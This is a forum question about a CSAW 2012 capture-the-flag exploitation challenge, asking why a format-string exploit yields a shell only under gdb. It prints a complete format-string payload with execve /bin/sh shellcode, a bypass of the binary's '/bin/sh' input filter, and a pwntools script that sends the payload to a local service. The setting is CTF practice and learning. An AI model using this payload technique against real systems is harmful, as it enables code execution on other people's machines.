# CSAW 2012 challenge2 can't get shell out side of gdb

Tags: format-string, ctf

I tried to solve [this problem](http://shell-storm.org/repo/CTF/CSAW-2012/Exploitation/400/). I found FSB at `0x08048bfe _snprintf`. I loaded shell code by `\n`. ssc function checks whether user input include `/bin/sh`.

Most of shell code includes `/bin/sh`. I found ssc function checks only string before `\n`. I used [this shell code](http://shell-storm.org/shellcode/files/shellcode-827.php) and changed it a little.
My final shell code is:

```
'\x0c\xd5\xff\xff'*2+'\x0e\xd5\xff\xff'*2+'%10x'*3+'%45345c'+'%n'+'%22197c'+'%n'+'\n'+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\n"
```

I get shell(`/bin/bash`) with gdb but I can't get shell without gdb. I want to know the reason.

I used this script

```
from pwn import *
import time

payload = '\x0c\xd5\xff\xff'*2+'\x0e\xd5\xff\xff'*2+'%10x'*3+'%45375c'+'%n'+'%22167c'+'%n'+'\n'+"\x90"*50+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\n"

proc = remote('localhost', 23456)
proc.recv(1024)
proc.sendline(payload)
time.sleep(5)
proc.interactive()
```